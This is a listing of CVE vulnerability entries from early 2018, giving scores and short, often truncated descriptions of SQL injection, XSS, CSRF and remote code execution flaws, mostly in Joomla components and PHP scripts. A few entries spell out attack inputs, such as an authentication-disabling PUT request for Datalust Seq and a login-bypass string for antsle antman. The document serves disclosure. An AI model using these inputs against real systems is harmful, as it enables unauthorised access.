Windows Remote Assistance in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an
14-03-2018 - 13:29 14-03-2018 - 13:29
CVE-2018-7474 7.5
An issue was discovered in Textpattern CMS 4.6.2 and earlier. It is possible to inject SQL code in the variable "qty" on the page index.php.
14-03-2018 - 10:29 14-03-2018 - 10:29
CVE-2018-8096 7.5
Datalust Seq before 4.2.605 is vulnerable to Authentication Bypass (with the attacker obtaining admin access) via '"Name":"isauthenticationenabled","Value":false' in an api/settings/setting-isauthenticationenabled PUT request.
13-03-2018 - 20:29 13-03-2018 - 20:29
CVE-2018-1000094 6.5
CMS Made Simple version 2.2.5 contains a Remote Code Execution vulnerability in File Manager that can result in Allows an authenticated admin that has access to the file manager to execute code on the server. This attack appear to be exploitable via
12-03-2018 - 21:29 12-03-2018 - 21:29
CVE-2018-7538 7.5
A SQL injection vulnerability in the tracker functionality of Enalean Tuleap software engineering platform before 9.18 allows attackers to execute arbitrary SQL commands.
12-03-2018 - 17:29 12-03-2018 - 17:29
CVE-2018-8057 7.5
A SQL Injection vulnerability exists in Western Bridge Cobub Razor 0.8.0 via the channel_name or platform parameter in a /index.php?/manage/channel/addchannel request, related to /application/controllers/manage/channel.php.
11-03-2018 - 14:29 11-03-2018 - 14:29
CVE-2018-8056 5.0
Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via an invalid channel_name parameter to /index.php?/manage/channel/addchannel or a direct request to /export.php.
11-03-2018 - 14:29 11-03-2018 - 14:29
CVE-2018-7890 10.0
A remote code execution issue was discovered in Zoho ManageEngine Applications Manager before 13.6 (build 13640). The publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing a specifie
08-03-2018 - 17:29 08-03-2018 - 17:29
CVE-2017-15367 7.5
Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection vulnerabilities that could allow an attacker to access the Bacula database and, depending on configuration, escalate privileges on the server.
07-03-2018 - 15:29 07-03-2018 - 15:29
CVE-2018-7746 4.3
An issue was discovered in Western Bridge Cobub Razor 0.7.2. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel requ
07-03-2018 - 12:29 07-03-2018 - 12:29
CVE-2018-7745 5.0
An issue was discovered in Western Bridge Cobub Razor 0.7.2. Authentication is not required for /index.php?/install/installation/createuserinfo requests, resulting in account creation.
07-03-2018 - 12:29 07-03-2018 - 12:29
CVE-2018-7739 7.5
antsle antman before 0.9.1a allows remote attackers to bypass authentication via invalid characters in the username and password parameters, as demonstrated by a username=>&password=%0a string to the /login URI. This allows obtaining root permissions
06-03-2018 - 21:29 06-03-2018 - 21:29
CVE-2018-7737 5.0
In Z-BlogPHP 1.5.1.1740, there is Web Site physical path leakage, as demonstrated by admin_footer.php or admin_footer.php.
06-03-2018 - 16:29 06-03-2018 - 16:29
CVE-2018-7736 4.3
In Z-BlogPHP 1.5.1.1740, cmd.php has XSS via the ZC_BLOG_SUBNAME parameter or ZC_UPLOAD_FILETYPE parameter.
06-03-2018 - 16:29 06-03-2018 - 16:29
CVE-2018-7653 4.3
In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.
04-03-2018 - 14:29 04-03-2018 - 14:29
CVE-2015-4117 6.5
Vesta Control Panel before 0.9.8-14 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the backup parameter to list/backup/index.php.
28-02-2018 - 17:29 28-02-2018 - 17:29
CVE-2018-7477 7.5
SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4 via the Username and Password fields to parents/Parent_module/parent_login.php.
28-02-2018 - 02:29 28-02-2018 - 02:29
CVE-2018-7490 5.0
uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal.
26-02-2018 - 17:29 26-02-2018 - 17:29
CVE-2018-7448 8.5
Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure.
26-02-2018 - 12:29 26-02-2018 - 12:29
CVE-2017-18195 5.0
An issue was discovered in tools/conversations/view_ajax.php in Concrete5 before 8.3.0. An unauthenticated user can enumerate comments from all blog posts by POSTing requests to /index.php/tools/required/conversations/view_ajax with incremental 'cnvI
26-02-2018 - 12:29 26-02-2018 - 12:29
CVE-2018-6859 7.5
SQL Injection exists in PHP Scripts Mall Schools Alert Management Script 2.0.2 via the Login Parameter.
23-02-2018 - 13:29 23-02-2018 - 13:29
CVE-2018-6868 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Slickdeals / DealNews / Groupon Clone Script 3.0.2 via a User Profile Field parameter.
23-02-2018 - 08:29 23-02-2018 - 08:29
CVE-2018-6867 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Alibaba Clone Script 1.0.2 via a profile parameter.
23-02-2018 - 08:29 23-02-2018 - 08:29
CVE-2018-6866 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Learning and Examination Management System Script 2.3.1 via a crafted message.
23-02-2018 - 08:29 23-02-2018 - 08:29
CVE-2018-7319 7.5
SQL Injection exists in the OS Property Real Estate 3.12.7 component for Joomla! via the cooling_system1, heating_system1, or laundry parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7318 7.5
SQL Injection exists in the CheckList 1.1.1 component for Joomla! via the title_search, tag_search, name_search, description_search, or filter_order parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7317 5.0
Backup Download exists in the Proclaim 9.1.1 component for Joomla! via a direct request for a .sql file under backup/.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7316 7.5
Arbitrary File Upload exists in the Proclaim 9.1.1 component for Joomla! via a mediafileform action.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7315 7.5
SQL Injection exists in the Ek Rishta 2.9 component for Joomla! via the gender, age1, age2, religion, mothertounge, caste, or country parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7314 7.5
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7312 7.5
SQL Injection exists in the Alexandria Book Library 3.1.2 component for Joomla! via the letter parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7300 10.0
Directory Traversal / Arbitrary File Write / Remote Code Execution in the User.setLanguage method in eQ-3 AG Homematic CCU2 2.29.2 and earlier allows remote attackers to write arbitrary files to the device's filesystem. This vulnerability can be expl
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7297 10.0
Remote Code Execution in the TCL script interpreter in eQ-3 AG Homematic CCU2 2.29.2 and earlier allows remote attackers to obtain read/write access and execute system commands on the device. This vulnerability can be exploited by unauthenticated att
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7313 7.5
SQL Injection exists in the CW Tags 2.0.6 component for Joomla! via the searchtext array parameter.
22-02-2018 - 09:29 22-02-2018 - 09:29
CVE-2018-6936 3.5
Cross Site Scripting (XSS) exists on the D-Link DIR-600M C1 3.01 via the SSID or the name of a user account.
21-02-2018 - 17:29 21-02-2018 - 17:29
CVE-2018-6941 6.8
A /shell?cmd= CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution in conjunction with XSS.
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2018-6940 4.3
A /shell?cmd= XSS issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution in conjunction with CSRF.
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2017-16356 4.3
Reflected XSS in Kubik-Rubik SIGE (aka Simple Image Gallery Extended) before 3.3.0 allows attackers to execute JavaScript in a victim's browser by having them visit a plugins/content/sige/plugin_sige/print.php link with a crafted img, name, or captio
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2016-6272 5.0
XPath injection vulnerability in Epic MyChart allows remote attackers to access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp. NOTE: this was originally reported as a SQL inje
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2018-6024 7.5
SQL Injection exists in the Project Log 1.5.3 component for Joomla! via the search parameter.
18-02-2018 - 15:29 18-02-2018 - 15:29
CVE-2018-7216 6.0
Cross-site request forgery (CSRF) vulnerability in esop/toolkit/profile/regData.do in Bravo Tejari Procurement Portal allows remote authenticated users to hijack the authentication of application users for requests that modify their personal data by
18-02-2018 - 01:29 18-02-2018 - 01:29
CVE-2018-7198 4.3
October CMS through 1.0.431 allows XSS by entering HTML on the Add Posts page.
17-02-2018 - 22:29 17-02-2018 - 22:29
CVE-2018-7180 7.5
SQL Injection exists in the Saxum Astro 4.0.14 component for Joomla! via the publicid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7179 7.5
SQL Injection exists in the SquadManagement 1.0.3 component for Joomla! via the id parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7178 7.5
SQL Injection exists in the Saxum Picker 3.2.10 component for Joomla! via the publicid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7177 7.5
SQL Injection exists in the Saxum Numerology 3.0.4 component for Joomla! via the publicid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6585 7.5
SQL Injection exists in the JTicketing 2.0.16 component for Joomla! via a view=events action with a filter_creator or filter_events_cat parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6584 7.5
SQL Injection exists in the DT Register 3.2.7 component for Joomla! via a task=edit&id= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6583 7.5
SQL Injection exists in the Timetable Responsive Schedule 1.5 component for Joomla! via a view=event&alias= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6396 7.5
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6394 7.5
SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6373 7.5
SQL Injection exists in the Fastball 2.5 component for Joomla! via the season parameter in a view=player action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6372 7.5
SQL Injection exists in the JB Bus 2.3 component for Joomla! via the order_number parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6370 7.5
SQL Injection exists in the NeoRecruit 4.1 component for Joomla! via the (1) PATH_INFO or (2) name of a .html file under the all-offers/ URI.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6368 7.5
SQL Injection exists in the JomEstate PRO through 3.7 component for Joomla! via the id parameter in a task=detailed action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6006 7.5
SQL Injection exists in the JS Autoz 1.0.9 component for Joomla! via the vtype, pre, or prs parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6005 7.5
SQL Injection exists in the Realpin through 1.5.04 component for Joomla! via the pinboard parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6004 7.5
SQL Injection exists in the File Download Tracker 3.0 component for Joomla! via the dynfield[phone] or sess parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5994 7.5
SQL Injection exists in the JS Jobs 1.1.9 component for Joomla! via the zipcode parameter in a newest-jobs request, or the ta parameter in a view_resume request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5993 7.5
SQL Injection exists in the Aist through 2.0 component for Joomla! via the id parameter in a view=showvacancy request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5992 7.5
SQL Injection exists in the Staff Master through 1.0 RC 1 component for Joomla! via the name parameter in a view=staff request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5991 7.5
SQL Injection exists in the Form Maker 3.6.12 component for Joomla! via the id, from, or to parameter in a view=stats request, a different vulnerability than CVE-2015-2798.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5990 7.5
SQL Injection exists in the AllVideos Reloaded 1.2.x component for Joomla! via the divid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5989 7.5
SQL Injection exists in the ccNewsletter 2.x component for Joomla! via the id parameter in a task=removeSubscriber action, a related issue to CVE-2011-5099.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5987 7.5
SQL Injection exists in the Pinterest Clone Social Pinboard 2.0 component for Joomla! via the pin_id or user_id parameter in a task=getlikeinfo action, the ends parameter in a view=gift action, the category parameter in a view=home action, the uid pa
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5983 7.5
SQL Injection exists in the JquickContact 1.3.2.2.1 component for Joomla! via a task=refresh&sid= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5982 7.5
SQL Injection exists in the Advertisement Board 3.1.0 component for Joomla! via a task=show_rss_categories&catname= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5981 7.5
SQL Injection exists in the Gallery WD 1.3.6 component for Joomla! via the tag_id parameter or gallery_id parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5980 7.5
SQL Injection exists in the Solidres 2.5.1 component for Joomla! via the direction parameter in a hub.search action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5975 7.5
SQL Injection exists in the Smart Shoutbox 3.0.0 component for Joomla! via the shoutauthor parameter to the archive URI.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5974 7.5
SQL Injection exists in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5971 7.5
SQL Injection exists in the MediaLibrary Free 4.0.12 component for Joomla! via the id parameter or the mid array parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5970 7.5
SQL Injection exists in the JGive 2.0.9 component for Joomla! via the filter_org_ind_type or campaign_countries parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7176 6.8
FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users.php (aka the "add user" feature of the User Permissions page).
15-02-2018 - 23:29 15-02-2018 - 23:29
CVE-2017-5799 6.5
A Remote Code Execution vulnerability in HPE OpenCall Media Platform (OCMP) was found. The vulnerability impacts OCMP versions prior to 3.4.2 RP201 (for OCMP 3.x), all versions prior to 4.4.7 RP702 (for OCMP 4.x).
15-02-2018 - 17:29 15-02-2018 - 17:29
CVE-2017-5798 4.3
A Remote Code Execution vulnerability in HPE OpenCall Media Platform (OCMP) was found. The vulnerability impacts OCMP versions prior to 3.4.2 RP201 (for OCMP 3.x), all versions prior to 4.4.7 RP702 (for OCMP 4.x).
15-02-2018 - 17:29 15-02-2018 - 17:29
CVE-2018-6928 7.5
PHP Scripts Mall News Website Script 2.0.4 has SQL Injection via a search term.
13-02-2018 - 12:29 13-02-2018 - 12:29
CVE-2018-6889 6.5
An issue was discovered in Typesetter 5.1. It suffers from a Host header injection vulnerability, Using this attack, a malicious user can poison the web cache or perform advanced password reset attacks or even trigger arbitrary user re-direction.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6888 6.0
An issue was discovered in Typesetter 5.1. The User Permissions page (aka Admin/Users) suffers from critical flaw of Cross Site Request forgery: using a forged HTTP request, a malicious user can lead a user to unknowingly create / delete or modify a
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6864 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Multi religion Responsive Matrimonial 4.7.2 via a user profile update parameter.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6863 7.5
SQL Injection exists in PHP Scripts Mall Select Your College Script 2.0.2 via a Login Parameter.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6862 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Bitcoin MLM Software 1.0.2 via a profile field.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6861 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Lawyer Search Script 1.0.2 via a profile update parameter.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6860 6.5
Arbitrary File Upload and Remote Code Execution exist in PHP Scripts Mall Schools Alert Management Script 2.0.2 via a profile picture.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6858 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Facebook Clone Script.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6845 4.3
PHP Scripts Mall Multi Language Olx Clone Script 2.0.6 has XSS via the Leave Comment field.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6180 5.0
A flaw in the profile section of Online Voting System 1.0 allows an unauthenticated user to set an arbitrary password for other accounts.
08-02-2018 - 18:29 08-02-2018 - 18:29
CVE-2018-6655 3.5
PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS via an arbitrary profile field.
07-02-2018 - 16:29 07-02-2018 - 16:29
CVE-2018-6610 5.0
Information Leakage exists in the jLike 1.0 component for Joomla! via a task=getUserByCommentId request.
05-02-2018 - 17:29 05-02-2018 - 17:29
CVE-2018-6609 7.5
SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.
05-02-2018 - 17:29 05-02-2018 - 17:29
CVE-2018-6605 7.5
SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
05-02-2018 - 16:29 05-02-2018 - 16:29
CVE-2018-6604 7.5
SQL Injection exists in the Zh YandexMap 6.2.1.0 component for Joomla! via the id parameter in a task=getPlacemarkDetails request.
05-02-2018 - 16:29 05-02-2018 - 16:29
CVE-2018-6582 7.5
SQL Injection exists in the Zh GoogleMap 8.4.0.0 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
05-02-2018 - 16:29 05-02-2018 - 16:29
CVE-2017-9414 6.8
Cross-site request forgery (CSRF) vulnerability in the Subscribe to Podcast feature in Subsonic 6.1.1 allows remote attackers to hijack the authentication of unspecified victims for requests that conduct cross-site scripting (XSS) attacks or possibly
05-02-2018 - 11:29 05-02-2018 - 11:29
CVE-2018-6398 7.5
SQL Injection exists in the CP Event Calendar 3.0.1 component for Joomla! via the id parameter in a task=load action.
30-01-2018 - 10:29 30-01-2018 - 10:29
CVE-2018-6397 5.0
Directory Traversal exists in the Picture Calendar 3.1.4 component for Joomla! via the list.php folder parameter.
30-01-2018 - 10:29 30-01-2018 - 10:29
CVE-2018-6395 7.5
SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.
30-01-2018 - 10:29 30-01-2018 - 10:29
CVE-2018-6008 5.0
Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
29-01-2018 - 00:29 29-01-2018 - 00:29
CVE-2018-6007 6.8
CSRF exists in the JS Support Ticket 1.1.0 component for Joomla! and allows attackers to inject HTML or edit a ticket.
29-01-2018 - 00:29 29-01-2018 - 00:29
CVE-2018-5720 6.8
An issue was discovered on DODOCOOL DC38 3-in-1 N300 Mini Wireless Range Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that mod
29-01-2018 - 00:29 29-01-2018 - 00:29
CVE-2017-17976 7.5
In Utilities.php in Perfex CRM 1.9.7, Unrestricted file upload can lead to remote code execution.
26-01-2018 - 15:29 26-01-2018 - 15:29
CVE-2017-14523 5.0
** DISPUTED ** WonderCMS 2.3.1 is vulnerable to an HTTP Host header injection attack. It uses user-entered values to redirect pages. NOTE: the vendor reports that exploitation is unlikely because the attack can only come from a local machine or from
26-01-2018 - 15:29 26-01-2018 - 15:29
CVE-2018-5973 7.5
SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or CategoryID parameter.
25-01-2018 - 12:29 25-01-2018 - 12:29
CVE-2018-5954 5.0
phpFreeChat 1.7 and earlier allows remote attackers to cause a denial of service by sending a large number of connect commands.
25-01-2018 - 11:29 25-01-2018 - 11:29
CVE-2017-1000474 7.5
Soyket Chowdhury Vehicle Sales Management System version 2017-07-30 is vulnerable to multiple SQL Injecting in login/vehicle.php, login/profile.php, login/Actions.php, login/manage_employee.php, and login/sell.php scripts resulting in the expose of u
24-01-2018 - 17:29 24-01-2018 - 17:29
CVE-2018-6193 2.6
A Cross-Site Scripting (XSS) vulnerability was found in Routers2 2.24, affecting the 'rtr' GET parameter in a page=graph action to cgi-bin/routers2.pl.
24-01-2018 - 16:29 24-01-2018 - 16:29
CVE-2018-6190 3.5
Netis WF2419 V3.2.41381 devices allow XSS via the Description field on the MAC Filtering page.
24-01-2018 - 16:29 24-01-2018 - 16:29
CVE-2018-5705 4.3
Reservo Image Hosting 1.6 is vulnerable to XSS attacks. The affected function is its search engine (the t parameter to the /search URI). Since there is an user/admin login interface, it's possible for attackers to steal sessions of users and thus adm
24-01-2018 - 12:29 24-01-2018 - 12:29
CVE-2018-5988 7.5
SQL Injection exists in Flexible Poll 1.2 via the id parameter to mobile_preview.php or index.php.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5986 7.5
SQL Injection exists in Easy Car Script 2014 via the s_order or s_row parameter to site_search.php.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5985 7.5
SQL Injection exists in the LiveCRM SaaS Cloud 1.0 component for Joomla! via an r=site/login&company_id= request.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5984 7.5
SQL Injection exists in the Tumder (An Arcade Games Platform) 2.1 component for Joomla! via the PATH_INFO to the category/ URI.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5979 7.5
SQL Injection exists in Wchat Fully Responsive PHP AJAX Chat Script 1.5 via the login.php User field.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5978 7.5
SQL Injection exists in Facebook Style Php Ajax Chat Zechat 1.5 via the login.php User field.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5977 7.5
SQL Injection exists in Affiligator Affiliate Webshop Management System 2.1.0 via a search/?q=&price_type=range&price= request.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5976 6.8
Cross Site Request Forgery (CSRF) exists in RSVP Invitation Online 1.0 via function/account.php, as demonstrated by modifying the admin password.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5972 7.5
SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5969 6.8
Cross Site Request Forgery (CSRF) exists in Photography CMS 1.0 via clients/resources/ajax/ajax_new_admin.php, as demonstrated by adding an admin account.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2017-17999 7.5
SQL injection vulnerability in RISE Ultimate Project Manager 1.9 allows remote attackers to execute arbitrary SQL commands via the search parameter to index.php/knowledge_base/get_article_suggestion/.
23-01-2018 - 13:29 23-01-2018 - 13:29
CVE-2017-18049 4.3
In the CSV export feature of SilverStripe before 3.5.6, 3.6.x before 3.6.3, and 4.x before 4.0.1, it's possible for the output to contain macros and scripts, which may be executed if imported without sanitization into common software (including Micro
23-01-2018 - 01:29 23-01-2018 - 01:29
CVE-2018-2636 6.8
Vulnerability in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (subcomponent: Security). Supported versions that are affected are 2.7, 2.8 and 2.9. Difficult to exploit vulnerability allows unauthenticated attacker with
17-01-2018 - 21:29 17-01-2018 - 21:29
CVE-2017-10273 3.7
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerab
17-01-2018 - 21:29 17-01-2018 - 21:29
CVE-2018-5715 4.3
phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
16-01-2018 - 15:29 16-01-2018 - 15:29
CVE-2018-5370 4.3
BizLogic xnami 1.0 has XSS via the comment parameter in an addComment action to the /media/ajax URI.
16-01-2018 - 14:29 16-01-2018 - 14:29
CVE-2018-5479 4.3
FoxSash ImgHosting 1.5 (according to footer information) is vulnerable to XSS attacks. The affected function is its search engine via the search parameter to the default URI. Since there is an user/admin login interface, it's possible for attackers t
15-01-2018 - 11:29 15-01-2018 - 11:29
CVE-2018-5688 4.3
ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader function in setup/classes/class.ilSetupGUI.php in the Setup component.
14-01-2018 - 15:29 14-01-2018 - 15:29
CVE-2018-5315 7.5
The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection via the event_id parameter to event.php.
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-17970 7.5
Multiple SQL injection vulnerabilities in Muviko 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) email parameter to login.php; the (2) season_id parameter to themes/flixer/ajax/load_season.php; the (3) movie_id parameter to t
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-16887 5.0
The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services can result in disclosure of the WLAN key/password.
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-16886 6.8
The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services via CSRF can result in an unauthorized change of username or password of the
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-16885 5.0
Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2012-0699 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Family Connections CMS (aka FCMS) 2.9 and earlier allow remote attackers to hijack the authentication of arbitrary users for requests that (1) add news via an add action to familynews.php
11-01-2018 - 15:29 11-01-2018 - 15:29
CVE-2012-6667 4.3
Cross-site scripting (XSS) vulnerability in vbshout.php in DragonByte Technologies vBShout module for vBulletin allows remote attackers to inject arbitrary web script or HTML via the shout parameter in a shout action.
11-01-2018 - 11:29 11-01-2018 - 11:29
CVE-2018-5211 7.5
PHP Melody version 2.7.1 suffer from SQL Injection Time-based attack on the page ajax.php with the parameter playlist.
09-01-2018 - 11:29 09-01-2018 - 11:29
CVE-2018-5263 3.5
The StackIdeas EasyDiscuss (aka com_easydiscuss) extension before 4.0.21 for Joomla! allows XSS.
08-01-2018 - 18:29 08-01-2018 - 18:29
CVE-2017-7997 7.5
Multiple SQL injection vulnerabilities in Gespage before 7.4.9 allow remote attackers to execute arbitrary SQL commands via the (1) show_prn parameter to webapp/users/prnow.jsp or show_month parameter to (2) webapp/users/blhistory.jsp or (3) webapp/u
08-01-2018 - 14:29 08-01-2018 - 14:29
CVE-2017-16720 5.0
A Path Traversal issue was discovered in WebAccess versions prior to 8.3. An attacker has access to files within the directory structure of the target device.
05-01-2018 - 03:29 05-01-2018 - 03:29
CVE-2017-16716 7.5
A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands.
05-01-2018 - 03:29 05-01-2018 - 03:29
CVE-2017-14960 5.0
xDashboard in OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) v4.5SP1 Patch 13 has SQL Injection.
04-01-2018 - 12:29 04-01-2018 - 12:29
CVE-2018-0114 5.0
A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Sig
04-01-2018 - 01:29 04-01-2018 - 01:29
CVE-2017-8046 7.5
Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java co
04-01-2018 - 01:29 04-01-2018 - 01:29
CVE-2017-1000486 7.5
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
03-01-2018 - 15:29 03-01-2018 - 15:29
CVE-2017-1000432 6.0
Vanilla Forums below 2.1.5 are affected by CSRF leading to Deleting topics and comments from forums Admin access
02-01-2018 - 18:29 02-01-2018 - 18:29
CVE-2017-17098 7.5
The writeLog function in fn_common.php in gps-server.net GPS Tracking Software (self hosted) through 3.0 allows remote attackers to inject arbitrary PHP code via a crafted request that is mishandled during admin log viewing, as demonstrated by <?php
02-01-2018 - 10:29 02-01-2018 - 10:29
CVE-2017-17097 5.0
gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset procedure that immediately resets passwords upon an unauthenticated request, and then sends e-mail with a predictable (date-based) password to the admin, which makes it easie
02-01-2018 - 10:29 02-01-2018 - 10:29
CVE-2018-3811 7.5
